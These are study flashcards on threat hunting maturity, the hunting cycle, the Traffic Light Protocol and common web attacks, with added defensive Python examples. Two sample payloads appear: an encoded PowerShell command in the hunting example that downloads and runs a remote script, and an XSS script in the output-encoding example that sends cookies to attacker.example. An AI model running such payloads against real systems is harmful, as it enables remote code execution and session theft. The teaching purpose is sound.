Section 4 Flashcards

1
Q

What does HMM stand for?

A

Hunting Maturity Model

2
Q

What are the 5 levels of the HMM?

A
HM0 Initial (least proactive)
HM1 Minimal
HM2 Procedural
HM3 Innovative
HM4 Leading (most proactive)
3
Q

What is happening at HM0 level?

A

Relies only on automated alerting (for example IDS alerts) and does little or no routine data collection, so the organisation is reactive rather than proactive: it waits for an alert instead of looking for the adversary.

4
Q

What is happening at HM1 level?

A

Still relies on automated alerting, but also routinely collects logs from other systems (endpoints, servers, network devices), which at least lets analysts search that data for indicators of compromise published by others.

5
Q

What is happening at HM2 level?

A

Performs regular, proactive hunts rather than only reacting to alerts.
Collects large amounts of data.
Follows hunting procedures developed by external sources (vendors, threat intelligence reports) rather than creating its own.

6
Q

What is happening at HM3 level?

A

Does not rely on external sources for hunting procedures; develops its own.
Usually publishes such procedures for others to use.
Uses machine learning and other advanced analytics to see beyond the alert.

7
Q

What is happening at HM4 level?

A

Highest level.
Automates many tactical-level analyses.
Scripts or programs are written from proven intelligence and hunt procedures and run continuously, so analysts spend their time on new hunts rather than repeating old ones.

8
Q

What is the Threat Hunting Cycle?

A

Hypothesis
Investigation
Uncover
Inform and enrich

9
Q

What happens in the Hypothesis stage of the Threat Hunting Cycle?

A
The hypothesis states what the hunt expects to find:
Who (the threat actor)
What (the type of attack or malicious activity)
Where (the targeted systems, networks or data)
How (the tools, techniques and procedures used)
Whether vulnerable systems exist that the adversary could exploit
10
Q

What happens in the Investigation stage of the Threat Hunting Cycle?

A

Checking security system logs
Querying datasets (SIEM, NetFlow, endpoint telemetry)
Using machine learning and other analytics to help find malicious code or anomalous behaviour

11
Q

What happens in the Uncover stage of the Threat Hunting Cycle?

A
Identify the IOCs (indicators of compromise) found during the investigation
Identify the adversary's TTPs (tactics, techniques and procedures) that those indicators reveal
12
Q

What happens in the Inform and enrich stage of the Threat Hunting Cycle?

A

Lessons learned

Documentation of the previous steps

Feeding the new IOCs and TTPs back into detection content and analytics, so that the next hunt, and automated alerting, start from an enriched position

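As an added example (not part of the original flashcards), the four stages of the cycle carried through in Python over a handful of constructed process-creation events. The events, host names, user names, the hypothesis and the IP address 198.51.100.23 are made up for illustration; the ATT&CK technique ID T1059.001 (PowerShell) is real.

```python
import base64
import re

def encoded_cmd(script):
    # PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample process-creation events (made up for this example, not real telemetry).
EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "explorer.exe",
     "cmd": "notepad.exe C:\\notes.txt"},
    {"host": "ws07", "user": "bob", "parent": "WINWORD.EXE",
     "cmd": "powershell.exe -nop -w hidden -enc " + encoded_cmd(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a.ps1')")},
    {"host": "srv02", "user": "svc_backup", "parent": "services.exe",
     "cmd": "powershell.exe -File C:\\backup\\run.ps1"},
]

# 1. Hypothesis (who/what/where/how): a phishing operator (who) runs encoded PowerShell
#    (what) on user workstations (where) by having an Office document spawn it (how).
HYPOTHESIS = {
    "parent_re": r"^(WINWORD|EXCEL|POWERPNT)\.EXE$",
    "cmd_re": r"powershell.*-enc\s+([A-Za-z0-9+/=]+)",
}

def investigate(events, hypothesis):
    # 2. Investigation: query the dataset for events consistent with the hypothesis.
    return [e for e in events
            if re.search(hypothesis["parent_re"], e["parent"], re.I)
            and re.search(hypothesis["cmd_re"], e["cmd"], re.I)]

def uncover(hits, hypothesis):
    # 3. Uncover: decode the command lines to extract IOCs and record the TTP observed.
    iocs = set()
    for e in hits:
        blob = re.search(hypothesis["cmd_re"], e["cmd"], re.I).group(1)
        decoded = base64.b64decode(blob).decode("utf-16-le")
        iocs.update(re.findall(r"https?://[^\s'\"()]+", decoded))
    return {
        "iocs": sorted(iocs),
        "hosts": sorted(e["host"] for e in hits),
        "ttp": "T1059.001 PowerShell, launched by an Office application with -EncodedCommand",
    }

def inform(findings, hypothesis):
    # 4. Inform and enrich: turn the result into a reusable detection rule and a block
    #    list, so the next hunt (and automated alerting) starts from an enriched position.
    return {
        "rule": "Office application spawning encoded PowerShell",
        "match": {"parent": hypothesis["parent_re"], "cmd": hypothesis["cmd_re"]},
        "block_list": findings["iocs"],
        "ttp": findings["ttp"],
    }

def run_hunt(events=EVENTS, hypothesis=HYPOTHESIS):
    hits = investigate(events, hypothesis)
    findings = uncover(hits, hypothesis)
    return hits, findings, inform(findings, hypothesis)

if __name__ == "__main__":
    hits, findings, rule = run_hunt()
    print("hits:", [h["host"] for h in hits])
    print("findings:", findings)
    print("rule:", rule)
```

Only the Word-spawned, encoded command line matches; the backup service's plain `-File` invocation does not, which is the point of hunting on the parent/child relationship and the encoding rather than on "powershell.exe" alone.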
13
Q

What is the Hot Threat Dashboard?

A

It is used by SOCs to track and investigate the top 15 vulnerabilities currently threatening the network.
A vulnerability must have a CVSS score of 7.0 or higher to make it onto the Hot Threat Dashboard.
After 30 days a vulnerability is moved off the list and into the database.

14
Q

What is TLP?

A

Traffic Light Protocol

15
Q

In the Traffic Light Protocol, what are the different levels?

A

Red
Amber
Green
White
(These are the original TLP 1.0 labels. TLP 2.0, published by FIRST in 2022, renamed WHITE to CLEAR and added AMBER+STRICT between RED and AMBER.)

16
Q

What can be disclosed at TLP Red level?

A

Not for disclosure, restricted to participants only

17
Q

What can be disclosed at TLP Amber level?

A

Limited disclosure, restricted to participants' organizations only.

18
Q

What can be disclosed at TLP Green level?

A

Limited disclosure, restricted to the community

19
Q

What can be disclosed at TLP White level?

A

Disclosure is not limited.

20
Q

What is an injection attack?

A

An injection attack sends untrusted input to an interpreter as part of a command or query. In a SQL injection attack the attacker adds SQL statements to an online form field (or any other input) in the hope that the database will execute them: to retrieve data they are not authorised to see, to add or delete records, or to crash the database. Validating user input and, above all, using parameterised queries (prepared statements) instead of building SQL by string concatenation stops this attack.

21
Q

What is broken authentication & session management?

A

An attacker takes advantage of a failure to properly expire sessions, or to tie a session securely to an individual (for example predictable session IDs, session IDs exposed in URLs, or sessions that survive logout), and so hijacks another user's session.

22
Q

What is a Cross-site scripting (XSS) attack?

A

Poor input validation and, more precisely, missing output encoding allow an attacker to inject script into a page that the application then serves to other users. The script runs in the victim's browser with the site's own origin, so it might merely display a message or it might steal the user's cookies and perform actions as that user.

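An added example (not part of the original flashcards) showing a stored-XSS sink and its fix in Python using the standard-library `html.escape`; the attacker's comment and the host name attacker.example are constructed for illustration.

```python
import html

# Constructed attacker input (made up for this example): a "comment" submitted via a form.
ATTACKER_COMMENT = (
    "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"
)

def render_vulnerable(comment):
    # BAD: untrusted text is interpolated straight into the HTML, so any tags in it
    # become markup and the <script> runs in every visitor's browser (stored XSS).
    return '<p class="comment">%s</p>' % comment

def render_safe(comment):
    # GOOD: encode the characters that have meaning in HTML (&, <, >, ", ') so the
    # browser displays the text literally. Encode at output time, for the HTML context.
    return '<p class="comment">%s</p>' % html.escape(comment, quote=True)

def contains_script_tag(page):
    # Crude check to show the difference; real testing uses a browser or an HTML parser.
    return "<script" in page.lower()

if __name__ == "__main__":
    print(render_vulnerable(ATTACKER_COMMENT))
    print(render_safe(ATTACKER_COMMENT))
```

Encoding is context-specific: `html.escape` is right for text between tags and inside quoted attributes, but data placed inside a script block, a URL or a CSS value needs that context's encoding instead. Marking session cookies `HttpOnly` limits what a script that does get through can steal.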
23
Q

What is insecure direct object reference attack?

A

An attacker changes an identifier in a web address or request (for example the account ID in /account?id=1001) from their own to another user's and receives that user's information. This shows a lack of authorization, not authentication: the application knows who the user is but never checks that they are allowed to access the object being referenced.

24
Q

What is security misconfiguration attack?

A

An attacker takes advantage of improper configurations of any part of the application stack, including web servers, databases, or application code.

25
Q

What is a sensitive data exposure attack?

A

An attacker takes advantage of a failure to properly secure sensitive data, for example data sent in plaintext, weak or poorly protected encryption keys, or a broken or compromised encryption algorithm.

26
Q

What is missing function level access control?

A

When the application fails to enforce authorization on the server for restricted functions (for example admin pages), so that hiding the link in the user interface is the only protection; an attacker who requests the URL directly gets in.

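An added example (not part of the original flashcards) covering both the insecure direct object reference card and this one, since both are authorization failures: a Python sketch of an account lookup with and without an ownership check, and an admin-only function with and without a role check. The accounts, balances, user names and roles are constructed sample data, and the function names are hypothetical.

```python
class Forbidden(Exception):
    """Raised when the requesting user is not allowed to perform the action."""

def make_state():
    # Constructed sample data (made up for this example): account records and user roles.
    accounts = {
        1001: {"owner": "alice", "balance": 250},
        1002: {"owner": "bob", "balance": 9000},
    }
    roles = {"alice": "user", "bob": "user", "carol": "admin"}
    return accounts, roles

def get_account_vulnerable(accounts, current_user, account_id):
    # BAD (insecure direct object reference): the caller is authenticated, but whatever
    # account_id they put in the URL is served, so alice can read bob's account.
    return accounts[account_id]

def get_account_safe(accounts, current_user, account_id):
    # GOOD: object-level authorization; the referenced record must belong to the caller.
    record = accounts.get(account_id)
    if record is None or record["owner"] != current_user:
        raise Forbidden("account %s is not owned by %s" % (account_id, current_user))
    return record

def delete_user_vulnerable(roles, current_user, target_user):
    # BAD (missing function-level access control): the admin-only function is merely
    # hidden from the menu; nothing on the server checks the caller's role.
    roles.pop(target_user, None)
    return target_user not in roles

def delete_user_safe(roles, current_user, target_user):
    # GOOD: the role check is enforced on the server on every call, not in the UI.
    if roles.get(current_user) != "admin":
        raise Forbidden("%s is not an admin" % current_user)
    roles.pop(target_user, None)
    return target_user not in roles

def is_forbidden(fn, *args):
    # Helper so callers can check "was this refused?" without a try/except.
    try:
        fn(*args)
    except Forbidden:
        return True
    return False

if __name__ == "__main__":
    accounts, roles = make_state()
    print("alice reads bob (vulnerable):", get_account_vulnerable(accounts, "alice", 1002))
    print("alice reads bob (safe) refused:", is_forbidden(get_account_safe, accounts, "alice", 1002))
    print("alice deletes bob (safe) refused:", is_forbidden(delete_user_safe, roles, "alice", "bob"))
```

Note that a missing record and a record owned by someone else are refused the same way in `get_account_safe`, so an attacker cannot use the difference to enumerate which IDs exist.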
27
Q

What is Cross-site request forgery?

A

An attacker takes advantage of a failure to verify that each state-changing request was intentionally made by the user. The victim's browser, already logged in to the target site, is tricked (for example by a link or hidden form on a site the attacker controls) into sending a request the attacker chose, and the site accepts it because the session cookie is attached automatically. Per-session anti-CSRF tokens and SameSite cookies defend against it.

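An added example (not part of the original flashcards) that serves both the broken authentication and session management card and this one: a minimal server-side session store in Python with unguessable IDs, expiry enforced on every lookup, and a per-session anti-CSRF token checked on a state-changing request. The `SessionStore` class, the transfer handler and the timestamps are hypothetical and constructed for illustration; `secrets` and `hmac` are standard-library modules.

```python
import hmac
import secrets
import time

class Session:
    # Assumed server-side session record (illustrative, not a real framework's API).
    def __init__(self, user, now, ttl):
        self.user = user
        self.expires_at = now + ttl
        self.csrf_token = secrets.token_urlsafe(32)   # one secret per session

class SessionStore:
    def __init__(self, ttl_seconds=900):
        self.ttl = ttl_seconds
        self._sessions = {}

    def login(self, user, now=None):
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)   # unguessable ID, never derived from the username
        self._sessions[sid] = Session(user, now, self.ttl)
        return sid

    def get(self, sid, now=None):
        # Unknown or expired sessions are rejected; expired ones are dropped, not revived.
        now = time.time() if now is None else now
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now >= s.expires_at:
            del self._sessions[sid]
            return None
        return s

    def logout(self, sid):
        self._sessions.pop(sid, None)   # invalidate server-side, not just the cookie

    def handle_transfer(self, sid, form, now=None):
        # State-changing request: needs a live session AND a submitted token equal to
        # that session's CSRF token. A form on another origin cannot read that token,
        # so a forged request fails even though the browser attached the session cookie.
        s = self.get(sid, now)
        if s is None:
            return "login required"
        submitted = form.get("csrf_token", "")
        if not hmac.compare_digest(submitted, s.csrf_token):
            return "rejected: bad CSRF token"
        return "transfer of %s by %s accepted" % (form.get("amount"), s.user)

if __name__ == "__main__":
    store = SessionStore(ttl_seconds=60)
    sid = store.login("alice", now=1000)
    token = store.get(sid, now=1001).csrf_token
    print(store.handle_transfer(sid, {"amount": "10"}, now=1001))                       # forged
    print(store.handle_transfer(sid, {"amount": "10", "csrf_token": token}, now=1001))  # genuine
    print(store.handle_transfer(sid, {"amount": "10", "csrf_token": token}, now=1061))  # expired
```

`hmac.compare_digest` is used for the token comparison so that a mismatch takes the same time regardless of how many leading characters matched.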
28
Q

What is the "using components with known vulnerabilities" attack?

A

An attacker takes advantage of a failure to patch or update software (libraries, frameworks, servers) whose vulnerabilities are already public, so working exploits are often readily available and the unpatched component becomes an easy attack surface.

29
Q

What are unvalidated redirects and forwards?

A

An attacker takes advantage of a script's redirect or forward feature that accepts the destination from user input (for example a ?next= parameter) to present the illusion of following a link to a trusted site, only for the user to be redirected to a malicious one. The fix is to validate the destination against an allow-list of hosts or to accept only relative paths on the site itself.

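An added example (not part of the original flashcards) of validating a redirect target in Python with the standard-library `urllib.parse`, including the bypasses that naive checks miss (scheme-relative `//host`, backslashes, look-alike subdomains, user-info tricks and `javascript:` URLs). The allowed host `www.example.com`, the attacker host and the function name are assumptions for illustration.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.example.com"}   # assumed: the application's own host(s)

def safe_redirect_target(next_param, default="/"):
    """Return next_param if it stays on an allowed host, otherwise the default."""
    if not next_param:
        return default
    # Browsers treat backslashes like slashes in URLs; normalise so "/\evil" is
    # not mistaken for a same-site path.
    candidate = next_param.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return default   # javascript:, data:, etc.
    if parts.netloc:
        # Absolute or scheme-relative (//host) URL: the host must be exactly allow-listed.
        # .hostname drops user-info and port, so "https://www.example.com@attacker.example/"
        # is seen as attacker.example, and suffix matching is deliberately not used.
        host = (parts.hostname or "").lower()
        if host not in ALLOWED_HOSTS:
            return default
        return candidate
    # Relative target: must be a single-slash path, so "//host" and bare words are rejected.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return candidate

if __name__ == "__main__":
    for target in ["/account", "https://www.example.com/settings", "//attacker.example/",
                   "/\\attacker.example", "https://www.example.com.attacker.example/",
                   "https://www.example.com@attacker.example/", "javascript:alert(1)"]:
        print("%-50s -> %s" % (target, safe_redirect_target(target)))
```

The simplest safe policy is to accept only relative paths and never an external host; the allow-list branch is there for applications that genuinely must redirect to a second host of their own.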
30
Q

Examples of devices that produce Transaction Data?

A

DHCP Servers
DNS Servers
Proxy Servers

31
Q

Examples of devices that produce Alert Data?

A

AAA Server

IPS devices

32
Q

Examples of devices that produce Session Data?

A

NetFlow

Firewall